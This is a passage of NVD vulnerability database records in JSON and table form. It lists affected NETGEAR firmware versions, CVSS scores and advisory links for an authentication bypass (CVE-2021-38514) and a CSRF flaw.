"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4B484FA9-17B9-4829-9152-83691EE6A9BB",
"versionEndExcluding": "1.0.0.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F168C3F8-F77C-4918-A752-9A04CED2349E",
"versionEndExcluding": "1.0.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "536487B8-FF04-4526-BE91-44437256525C",
"versionEndExcluding": "1.0.3.38",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7500:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "2E0DFBF4-E393-44AE-AEF9-1B2059EE5AE8",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2C2195F1-18F6-4397-9D28-7A92003B7A76",
"versionEndExcluding": "1.0.2.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "17CF7445-6950-45FE-9D1A-E23F63316329",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "845CF217-8361-4D5B-811D-B9CEB68880CB",
"versionEndExcluding": "1.0.3.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "98FAEBDA-5FBA-402D-9BA1-25E5DF4EF55F",
"versionEndExcluding": "1.0.4.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8BBB7E16-D31C-49EA-9D82-D3BACED95441",
"versionEndExcluding": "1.4.1.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D6A70D-66AF-4064-9F1B-4358D4B1F016",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6791754E-E5F9-42EA-AFDA-F93E8227A7C8",
"versionEndExcluding": "1.4.1.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7EF872D-2537-4FEB-8799-499FC9D44339",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FD0AB065-3152-492B-A66D-2BCCA1E3B1DA",
"versionEndExcluding": "1.0.2.128",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "28EC6190-68BC-4D9A-9973-01935EB3472F",
"versionEndExcluding": "1.0.2.128",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r9000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EEFCBDB9-47D0-40EF-9428-FF714763BC12",
"versionEndExcluding": "1.0.3.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r9000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D74F1BFC-562E-4E7D-BBAB-2F8B593B5A57",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbs40v_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6160F657-601E-4BDD-949A-D1411F08A8F9",
"versionEndExcluding": "2.2.0.58",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rbs40v:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F0D05F28-47A2-46AE-992E-132B34F6194B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbk50v_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AF38D418-BF9B-4C69-8D05-6D216B487182",
"versionEndExcluding": "2.2.0.58",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rbk50v:-:*:*:*:*:*:*:*",
"matchCriteriaId": "54453B5D-4E51-4DAB-8670-5A99C0D4CE3E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn2000rpt_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "317AE6B1-BA33-49DF-A839-A49C5493996E",
"versionEndExcluding": "1.0.1.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn2000rpt:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "6FB1BE0D-E3CF-4C16-8C11-706B238E9934",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn2500rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0675F6C4-EB61-4DA3-8473-448E93D5E0A5",
"versionEndExcluding": "1.0.1.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn2500rp:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "1C4C1B98-9551-4862-AEAC-3D5C313BD275",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn3000rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "250E8C27-ED0F-46FC-B630-52E9BF2CA812",
"versionEndExcluding": "1.0.2.78",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn3000rp:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "AB71AC74-2D1B-4F1E-A70F-6590A00AAD9E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn3100rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A480981E-57ED-47E3-B9AB-190E4783DC04",
"versionEndExcluding": "1.0.0.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn3100rp:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "4D8680F5-0C06-4CFC-8BA0-CF85D0438419",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "46D1F73B-1AE0-40AE-BED7-CAE3C7EFEE3B",
"versionEndExcluding": "1.0.1.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FD376891-1FB6-48B7-A4B3-C3C2C6E92C39",
"versionEndExcluding": "1.0.2.102",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3700:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "257A5E68-8EDC-44F5-A85C-83A91C93CCE5",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9FFDF78E-8CC6-47B8-B70D-352F778CBF2C",
"versionEndExcluding": "1.0.2.104",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4300:v1:*:*:*:*:*:*:*",
"matchCriteriaId": "D99E146D-B278-4CA6-8156-7D9923015779",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "94398B78-9F11-4AD2-A518-3A81CDD72E88",
"versionEndExcluding": "1.0.0.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "4428B145-B86D-4709-BBA9-64BDE7D35A25",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "68F195E4-0A6D-400B-8F48-3EA07DC3A3ED",
"versionEndExcluding": "1.0.0.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4500:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "C31D6808-4103-4543-B7AB-84A79CD12006",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9F3D02E3-8FA1-4129-A4B2-25235AF0E49C",
"versionEndExcluding": "1.0.0.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2000:v5:*:*:*:*:*:*:*",
"matchCriteriaId": "317F25FF-B3A2-4C68-888F-D2627C564867",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2020_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E0141851-BE96-4F6A-883F-3B20AE6945C1",
"versionEndExcluding": "1.1.0.62",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2020:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C2189628-03E7-445A-9EF2-656A85539115",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2050_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "727F8FD9-692C-4752-9B1E-D6281919061C",
"versionEndExcluding": "1.1.0.62",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2050:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9877579C-D214-4605-93AA-2B78914CF33C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E1748207-4BAA-4CC2-AD44-19D895B1C08B",
"versionEndExcluding": "1.2.0.62",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:xr500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7C031037-5177-4871-9C61-15BC580CC41D",
"versionEndExcluding": "2.3.2.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:xr500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9E203D92-F97B-4F5B-B395-3A5DEDBF1C1C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by authentication bypass. This affects D3600 before 1.0.0.72, D6000 before 1.0.0.72, D6100 before 1.0.0.63, D6200 before 1.1.00.34, D6220 before 1.0.0.48, D6400 before 1.0.0.86, D7000 before 1.0.1.70, D7000v2 before 1.0.0.52, D7800 before 1.0.1.56, D8500 before 1.0.3.44, DC112A before 1.0.0.42, DGN2200v4 before 1.0.0.108, DGND2200Bv4 before 1.0.0.108, EX2700 before 1.0.1.48, EX3700 before 1.0.0.76, EX3800 before 1.0.0.76, EX6000 before 1.0.0.38, EX6100 before 1.0.2.24, EX6100v2 before 1.0.1.76, EX6120 before 1.0.0.42, EX6130 before 1.0.0.28, EX6150v1 before 1.0.0.42, EX6150v2 before 1.0.1.76, EX6200 before 1.0.3.88, EX6200v2 before 1.0.1.72, EX6400 before 1.0.2.136, EX7000 before 1.0.0.66, EX7300 before 1.0.2.136, EX8000 before 1.0.1.180, RBK50 before 2.1.4.10, RBR50 before 2.1.4.10, RBS50 before 2.1.4.10, RBK40 before 2.1.4.10, RBR40 before 2.1.4.10, RBS40 before 2.1.4.10, RBW30 before 2.2.1.204, PR2000 before 1.0.0.28, R6020 before 1.0.0.38, R6080 before 1.0.0.38, R6050 before 1.0.1.18, JR6150 before 1.0.1.18, R6120 before 1.0.0.46, R6220 before 1.1.0.86, R6250 before 1.0.4.34, R6300v2 before 1.0.4.32, R6400 before 1.0.1.44, R6400v2 before 1.0.2.62, R6700 before 1.0.1.48, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900v2 before 1.2.0.36, R6900 before 1.0.1.48, R7000 before 1.0.9.34, R6900P before 1.3.1.64, R7000P before 1.3.1.64, R7100LG before 1.0.0.48, R7300DST before 1.0.0.70, R7500v2 before 1.0.3.38, R7800 before 1.0.2.52, R7900 before 1.0.3.8, R8000 before 1.0.4.28, R7900P before 1.4.1.30, R8000P before 1.4.1.30, R8300 before 1.0.2.128, R8500 before 1.0.2.128, R9000 before 1.0.3.10, RBS40V before 2.2.0.58, RBK50V before 2.2.0.58, WN2000RPTv3 before 1.0.1.32, WN2500RPv2 before 1.0.1.54, WN3000RPv3 before 1.0.2.78, WN3100RPv2 before 1.0.0.66, WNDR3400v3 before 1.0.1.22, WNDR3700v4 before 1.0.2.102, WNDR4300v1 before 1.0.2.104, WNDR4300v2 before 1.0.0.56, WNDR4500v3 before 1.0.0.56, WNR2000v5 (R2000) before 1.0.0.66, WNR2020 before 1.1.0.62, WNR2050 before 1.1.0.62, WNR3500Lv2 before 1.2.0.62, and XR500 before 2.3.2.22."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una omisi\u00f3n de la autenticaci\u00f3n. Esto afecta a D3600 versiones anteriores a 1.0.0.72, D6000 versiones anteriores a 1.0.0.72, D6100 versiones anteriores a 1.0.0.63, D6200 versiones anteriores a 1.1.00.34, D6220 versiones anteriores a 1.0.0.48, D6400 versiones anteriores a 1.0.0.86, D7000 versiones anteriores a 1.0.1.70, D7000v2 versiones anteriores a 1.0.0.52, D7800 versiones anteriores a 1.0.1.56, D8500 versiones anteriores a 1.0.3.44, DC112A versiones anteriores a 1.0.0.42, DGN8000 versiones anteriores a 1.0.4.98. 0.0.42, DGN2200v4 versiones anteriores a 1.0.0.108, DGND2200Bv4 versiones anteriores a 1.0.0.108, EX2700 versiones anteriores a 1.0.1.48, EX3700 versiones anteriores a 1.0.0.76, EX3800 versiones anteriores a 1.0.0.76, EX6000 versiones anteriores a 1.0.0.38, EX6100 versiones anteriores a 1.0.2.24, EX6100v2 versiones anteriores a 1.0.1.76, EX6120 versiones anteriores a 1.0.0.42, EX6130 versiones anteriores a 1. 0.0.28, EX6150v1 versiones anteriores a 1.0.0.42, EX6150v2 versiones anteriores a 1.0.1.76, EX6200 versiones anteriores a 1.0.3.88, EX6200v2 versiones anteriores a 1.0.1.72, EX6400 versiones anteriores a 1.0.2.136, EX7000 versiones anteriores a 1.0.0.66, EX7300 versiones anteriores a 1.0.2.136, EX8000 versiones anteriores a 1.0.1.180, RBK50 versiones anteriores a 2.1.4.10, RBR50 versiones anteriores a 2.1.4. 10, RBS50 versiones anteriores a 2.1.4.10, RBK40 versiones anteriores a 2.1.4.10, RBR40 versiones anteriores a 2.1.4.10, RBS40 versiones anteriores a 2.1.4.10, RBW30 versiones anteriores a 2.2.1.204, PR2000 versiones anteriores a 1.0.0.28, R6020 versiones anteriores a 1.0.0.38, R6080 versiones anteriores a 1.0.0.38, R6050 versiones anteriores a 1.0.1.18, JR6150 versiones anteriores a 1.0.1.18, R6120 versiones anteriores a 1.0. 0.46, R6220 versiones anteriores a 1.1.0.86, R6250 versiones anteriores a 1.0.4.34, R6300v2 versiones anteriores a 1.0.4.32, R6400 versiones anteriores a 1.0.1.44, R6400v2 versiones anteriores a 1.0.2. 62, R6700 versiones anteriores a 1.0.1.48, R6700v2 versiones anteriores a 1.2.0.36, R6800 versiones anteriores a 1.2.0.36, R6900v2 versiones anteriores a 1.2.0.36, R6900 versiones anteriores a 1.0.1.48, R7000 versiones anteriores a 1. 0.9.34, R6900P versiones anteriores a 1.3.1.64, R7000P versiones anteriores a 1.3.1.64, R7100LG versiones anteriores a 1.0.0.48, R7300DST versiones anteriores a 1.0.0.70, R7500v2 versiones anteriores a 1. 0.3.38, R7800 versiones anteriores a 1.0.2.52, R7900 versiones anteriores a 1.0.3.8, R8000 versiones anteriores a 1.0.4.28, R7900P versiones anteriores a 1.4.1.30, R8000P versiones anteriores a 1.4.1. 30, R8300 versiones anteriores a 1.0.2.128, R8500 versiones anteriores a 1.0.2.128, R9000 versiones anteriores a 1.0.3.10, RBS40V versiones anteriores a 2.2.0.58, RBK50V versiones anteriores a 2.2.0. 58, WN2000RPTv3 versiones anteriores a 1.0.1.32, WN2500RPv2 versiones anteriores a 1.0.1.54, WN3000RPv3 versiones anteriores a 1.0.2.78, WN3100RPv2 versiones anteriores a 1.0.0.66, WNDR3400v3 versiones anteriores a 1.0. 1.22, WNDR3700v4 versiones anteriores a 1.0.2.102, WNDR4300v1 versiones anteriores a 1.0.2.104, WNDR4300v2 versiones anteriores a 1.0.0.56, WNDR4500v3 versiones anteriores a 1.0.0. 56, WNR2000v5 (R2000) versiones anteriores a 1.0.0.66, WNR2020 versiones anteriores a 1.1.0.62, WNR2050 versiones anteriores a 1.1.0.62, WNR3500Lv2 versiones anteriores a 1.2.0.62 y XR500 versiones anteriores a 2.3.2.22"
}
],
"id": "CVE-2021-38514",
"lastModified": "2024-11-21T06:17:17.693",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 2.4,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 0.9,
"impactScore": 1.4,
"source": "cve@mitre.org",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 2.7,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2021-08-11T00:15:15.663",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000063757/Security-Advisory-for-Authentication-Bypass-on-Some-Routers-Extenders-and-WiFi-Systems-PSV-2017-2449"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000063757/Security-Advisory-for-Authentication-Bypass-on-Some-Routers-Extenders-and-WiFi-Systems-PSV-2017-2449"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-22 17:15
Modified
2024-11-21 03:20
Severity ?
Summary
Certain NETGEAR devices are affected by CSRF. This affects R6300v2 before 1.0.4.8, R6400v2 before 1.0.2.32, R6700 before 1.0.1.22, R6900 before 1.0.1.22, R7000P before 1.0.0.86, R6900P before 1.0.0.56, R7300 before 1.0.0.54, R8300 before 1.0.2.106, R8500 before 1.0.2.106, DGN2200v4 before 1.0.0.86, DGND2200Bv4 before 1.0.0.86, R6050 before 1.0.0.86, JR6150 before 1.0.1.10, R6220 before 1.1.0.50, and WNDR3700v5 before V1.1.0.48.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| netgear | r6300_firmware | * | |
| netgear | r6300 | v2 | |
| netgear | r6400_firmware | * | |
| netgear | r6400 | v2 | |
| netgear | r6700_firmware | * | |
| netgear | r6700 | - | |
| netgear | r6900_firmware | * | |
| netgear | r6900 | - | |
| netgear | r7000p_firmware | * | |
| netgear | r7000p | - | |
| netgear | r6900p_firmware | * | |
| netgear | r6900p | - | |
| netgear | r7300_firmware | * | |
| netgear | r7300 | - | |
| netgear | r8300_firmware | * | |
| netgear | r8300 | - | |
| netgear | r8500_firmware | * | |
| netgear | r8500 | - | |
| netgear | dgn2200_firmware | * | |
| netgear | dgn2200 | v4 | |
| netgear | dgnd2200b_firmware | * | |
| netgear | dgnd2200b | v4 | |
| netgear | r6050_firmware | * | |
| netgear | r6050 | - | |
| netgear | jr6150_firmware | * | |
| netgear | jr6150 | - | |
| netgear | r6220_firmware | * | |
| netgear | r6220 | - | |
| netgear | wndr3700_firmware | * | |
| netgear | wndr3700 | v5 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F8097CEE-2577-4C44-9260-8B2DD2D2CA78",
"versionEndExcluding": "1.0.4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DB7B08B9-07D2-4404-846A-D1CA02C16557",
"versionEndExcluding": "1.0.2.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3C3255EE-BBE5-4EBE-92CC-D0C6E6D8563F",
"versionEndExcluding": "1.0.1.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "24E4CE14-4FC5-4F73-BFC8-F0B0D924F788",
"versionEndExcluding": "1.0.1.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5DE72464-B835-46E1-ABFE-47EC0FFB390A",
"versionEndExcluding": "1.0.0.86",
"vulnerable": true
}
],
"negate": false,
